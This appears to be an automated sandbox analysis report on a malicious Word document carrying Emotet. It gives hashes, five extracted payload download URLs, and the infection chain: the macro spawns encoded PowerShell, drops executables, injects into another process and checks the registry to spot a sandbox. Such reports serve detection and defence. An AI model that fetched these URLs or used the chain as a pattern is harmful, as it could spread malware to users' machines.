Analysis
- max time kernel: 139s
- max time network: 149s
- platform: windows10_x64
- resource: win10v200722
- submitted: 01-08-2020 19:37
- Static task: static1
- Behavioral task: behavioral1
- Sample: SecuriteInfo.com.Exploit.Siggen2.13465.21876.20371.doc
- Resource: win7
General
- Target: SecuriteInfo.com.Exploit.Siggen2.13465.21876.20371.doc
- Size: 168KB
- MD5: 7b47c08a4c4f10203169c0c7ceab2170
- SHA1: b5b04a8ff3dcd39452cef492f13e86c510fa8131
- SHA256: 3d5427a07cdecdce3e2943473bf2a141a3eeff0e22919c7b1fe3378aed3d1590
- SHA512: 26875b4b30d31a63d875b8ddb4b8671e76de16b6725e07d923f499b6bbcaeb6c67ad1ee369d8425862eee33228b36259b5b02a10308e32cd3157e26cfdf38524
Malware Config
Extracted:
- http://rectificadoscarrion.com/wp-includes/EiQ/
- http://renekok.com/QbWyat/
- http://www.onlinemediadesigns.com/bin/nObh/
- http://renegaderadio.net/haunted/cA5zuC5/
- http://qatifsport.net/t/NbQq254/
Extracted: emotet
Signatures
Suspicious behavior: AddClipboardFormatListener (2 IoCs)
Processes (pid | process):
  488 | WINWORD.EXE
  488 | WINWORD.EXE
Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
Processes (description | pid | pid_target | process | target process):
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 3140 | 2044 | powersheLL.exe |
Executes dropped EXE (2 IoCs)
Processes (pid | process):
  2584 | 285.exe
  568 | KBDES.exe
Suspicious use of WriteProcessMemory (3 IoCs)
Processes (description | pid | process | target process):
  PID 2584 wrote to memory of 568 | 2584 | 285.exe | KBDES.exe (3 entries)
Emotet Payload (4 IoCs)
Detects Emotet payload in memory.
Processes (resource | yara_rule):
  behavioral2/memory/2584-10-0x0000000000690000-0x000000000069C000-memory.dmp | emotet (2 entries)
  behavioral2/memory/568-13-0x0000000000780000-0x000000000078C000-memory.dmp | emotet (2 entries)
Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes (description | ioc | process):
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WINWORD.EXE
Drops file in System32 directory (1 IoC)
Processes (description | ioc | process):
  File opened for modification | C:\Windows\SysWOW64\TimeDateMUICallback\KBDES.exe | 285.exe
Suspicious use of SetWindowsHookEx (11 IoCs)
Processes (pid | process):
  488 | WINWORD.EXE (9 entries)
  2584 | 285.exe
  568 | KBDES.exe
Suspicious behavior: EnumeratesProcesses (9 IoCs)
Processes (pid | process):
  3140 | powersheLL.exe (3 entries)
  568 | KBDES.exe (6 entries)
Blacklisted process makes network request (1 IoC)
Processes (flow | pid | process):
  27 | 3140 | powersheLL.exe
Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes (description | ioc | process):
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WINWORD.EXE
Suspicious use of AdjustPrivilegeToken (1 IoC)
Processes (description | pid | process):
  Token: SeDebugPrivilege | 3140 | powersheLL.exe
Processes
- C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.Siggen2.13465.21876.20371.doc" /o ""
  - Suspicious behavior: AddClipboardFormatListener
  - Checks processor information in registry
  - Suspicious use of SetWindowsHookEx
  - Enumerates system info in registry
- C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
  Command line: powersheLL -e <encoded command removed>
  - Process spawned unexpected child process
  - Suspicious behavior: EnumeratesProcesses
  - Blacklisted process makes network request
  - Suspicious use of AdjustPrivilegeToken
- C:\Users\Admin\285.exe
  Command line: C:\Users\Admin\285.exe
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  - Drops file in System32 directory
  - Suspicious use of SetWindowsHookEx
- C:\Windows\SysWOW64\TimeDateMUICallback\KBDES.exe
  Command line: "C:\Windows\SysWOW64\TimeDateMUICallback\KBDES.exe"
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  - Suspicious behavior: EnumeratesProcesses
Downloads
- C:\Users\Admin\285.exe
- C:\Windows\SysWOW64\TimeDateMUICallback\KBDES.exe
- memory/488-4-0x000001D38DFA1000-0x000001D38DFD1000-memory.dmp (192KB)
- memory/568-11-0x0000000000000000-mapping.dmp
- memory/568-13-0x0000000000780000-0x000000000078C000-memory.dmp (48KB)
- memory/2584-10-0x0000000000690000-0x000000000069C000-memory.dmp (48KB)